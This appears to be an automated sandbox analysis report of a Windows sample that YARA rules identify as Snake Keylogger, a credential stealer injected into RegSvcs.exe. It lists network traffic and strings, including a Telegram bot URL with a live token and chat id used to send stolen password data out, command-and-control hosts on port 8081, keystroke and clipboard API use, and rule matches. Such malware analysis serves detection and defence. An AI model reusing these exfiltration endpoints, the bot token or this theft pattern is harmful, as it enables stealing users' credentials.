                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: unknownHTTP traffic detected: POST /bot7735874420:AAHB5lmusBq4MdXRakEVmgMVQ6wUkxr5YLE/sendDocument?chat_id=2146433139&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd32545f3d1fd1Host: api.telegram.orgContent-Length: 584
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 10 Jan 2025 19:37:54 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: RegSvcs.exe, 00000002.00000002.4603067666.00000000032B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                  Source: 19d6P55zd1.exe, 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4601945370.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: 19d6P55zd1.exe, 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4603067666.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4601945370.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                  Source: 19d6P55zd1.exe, 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4603067666.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4601945370.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: RegSvcs.exe, 00000002.00000002.4603067666.00000000032B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                  Source: RegSvcs.exe, 00000002.00000002.4603067666.00000000030C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: RegSvcs.exe, 00000002.00000002.4603067666.00000000030C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: 19d6P55zd1.exe, 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4601945370.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: RegSvcs.exe, 00000002.00000002.4603067666.00000000030C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: 19d6P55zd1.exe, 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4603067666.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4601945370.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4604479109.00000000040E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: RegSvcs.exe, 00000002.00000002.4603067666.00000000031A8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4603067666.00000000032B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: RegSvcs.exe, 00000002.00000002.4603067666.00000000032B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: RegSvcs.exe, 00000002.00000002.4603067666.00000000031A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                  Source: RegSvcs.exe, 00000002.00000002.4603067666.00000000031A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:066656%0D%0ADate%20a
                  Source: RegSvcs.exe, 00000002.00000002.4603067666.00000000032B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7735874420:AAHB5lmusBq4MdXRakEVmgMVQ6wUkxr5YLE/sendDocument?chat_id=2146
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4604479109.00000000040E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4604479109.00000000040E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4604479109.00000000040E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: RegSvcs.exe, 00000002.00000002.4603067666.0000000003259000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4603067666.000000000328A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                  Source: RegSvcs.exe, 00000002.00000002.4603067666.0000000003254000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4604479109.00000000040E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4604479109.00000000040E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4604479109.00000000040E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: RegSvcs.exe, 00000002.00000002.4603067666.0000000003180000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4603067666.00000000031A8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4603067666.0000000003110000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: 19d6P55zd1.exe, 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4601945370.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4603067666.0000000003110000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: RegSvcs.exe, 00000002.00000002.4603067666.0000000003110000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                  Source: RegSvcs.exe, 00000002.00000002.4603067666.0000000003180000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4603067666.000000000313B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4603067666.00000000031A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4604479109.00000000040E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4604479109.00000000040E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: RegSvcs.exe, 00000002.00000002.4603067666.000000000327B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                  Source: RegSvcs.exe, 00000002.00000002.4603067666.0000000003285000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49787 version: TLS 1.2
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_00394164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00394164
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_00394164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00394164
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_00393F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00393F66
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_0038001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0038001C
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_003ACABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_003ACABC

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.19d6P55zd1.exe.1e90000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.19d6P55zd1.exe.1e90000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.19d6P55zd1.exe.1e90000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.19d6P55zd1.exe.1e90000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.19d6P55zd1.exe.1e90000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.19d6P55zd1.exe.1e90000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000002.00000002.4601945370.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: Process Memory Space: 19d6P55zd1.exe PID: 4340, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: RegSvcs.exe PID: 1340, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Binary is likely a compiled AutoIt script file
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: This is a third-party compiled AutoIt script.0_2_00323B3A
                  Source: 19d6P55zd1.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: 19d6P55zd1.exe, 00000000.00000000.2129021988.00000000003D4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e102d34a-8
                  Source: 19d6P55zd1.exe, 00000000.00000000.2129021988.00000000003D4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_57276ffa-e
                  Source: 19d6P55zd1.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_03e29e4e-5
                  Source: 19d6P55zd1.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_860bf518-7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_0038A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_0038A1EF
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_00378310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00378310
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_003851BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_003851BD
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_0032E6A00_2_0032E6A0
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_0034D9750_2_0034D975
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_0032FCE00_2_0032FCE0
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_003421C50_2_003421C5
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_003562D20_2_003562D2
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_003A03DA0_2_003A03DA
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_0035242E0_2_0035242E
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_003425FA0_2_003425FA
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_0037E6160_2_0037E616
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_003366E10_2_003366E1
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_0035878F0_2_0035878F
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_003388080_2_00338808
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_003A08570_2_003A0857
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_003568440_2_00356844
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_003888890_2_00388889
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_00360AB40_2_00360AB4
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_0034CB210_2_0034CB21
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_00356DB60_2_00356DB6
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_00336F9E0_2_00336F9E
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_003330300_2_00333030
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_003431870_2_00343187
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_0034F1D90_2_0034F1D9
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_003212870_2_00321287
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_003414840_2_00341484
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_003355200_2_00335520
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_003476960_2_00347696
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_003357600_2_00335760
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_003419780_2_00341978
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_00359AB50_2_00359AB5
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_0034BDA60_2_0034BDA6
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_00341D900_2_00341D90
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_003A7DDB0_2_003A7DDB
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_0032DF000_2_0032DF00
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_00333FE00_2_00333FE0
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_0123ABD00_2_0123ABD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0156C1462_2_0156C146
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0156A0882_2_0156A088
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_015653622_2_01565362
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0156D2782_2_0156D278
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0156C4682_2_0156C468
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0156C7382_2_0156C738
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0156E9882_2_0156E988
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_015669A02_2_015669A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_01563B952_2_01563B95
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0156CA082_2_0156CA08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0156CCD82_2_0156CCD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_01566FC82_2_01566FC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0156CFA92_2_0156CFA9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_01563E092_2_01563E09
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0156F6312_2_0156F631
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0156E97A2_2_0156E97A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_015629EC2_2_015629EC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0156FA882_2_0156FA88
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_01563AA12_2_01563AA1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B561E82_2_05B561E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B5F1582_2_05B5F158
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B52DA82_2_05B52DA8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B54D982_2_05B54D98
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B52D9A2_2_05B52D9A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B54D892_2_05B54D89
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B50DF02_2_05B50DF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B50DE02_2_05B50DE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B575082_2_05B57508
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B5BCB22_2_05B5BCB2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B5D4A82_2_05B5D4A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B5D4972_2_05B5D497
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B5EC902_2_05B5EC90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B5EC812_2_05B5EC81
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B524882_2_05B52488
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B58CF02_2_05B58CF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B574F82_2_05B574F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B58CE12_2_05B58CE1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B504D02_2_05B504D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B5A4D82_2_05B5A4D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B5BCC02_2_05B5BCC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B504C02_2_05B504C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B5A4C82_2_05B5A4C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B524772_2_05B52477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B544782_2_05B54478
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B544672_2_05B54467
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B5E7B92_2_05B5E7B9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B59FFF2_2_05B59FFF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B51FF82_2_05B51FF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B5B7F82_2_05B5B7F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B5CFE02_2_05B5CFE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B53FE82_2_05B53FE8
